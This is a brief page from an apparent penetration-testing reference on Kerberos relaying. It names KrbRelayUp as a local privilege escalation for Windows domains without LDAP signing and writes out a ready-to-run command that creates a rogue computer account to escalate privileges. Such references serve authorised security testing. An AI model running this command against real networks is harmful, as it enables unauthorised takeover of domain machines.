> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/kerberos/kerberos-relaying.md).

# Kerberos Relaying

### KrbRelayUp

> A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

* [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)

One of the requirements for this attack to work is for LDAP Signing to be disabled within the Active Directory environment.

```bash
# Escalate privileges using KrbRelayUp
.\KrbRelayUp.exe relay -Domain $domain -CreateNewComputerAccount -ComputerName $evilname -ComputerPassword $password 
```
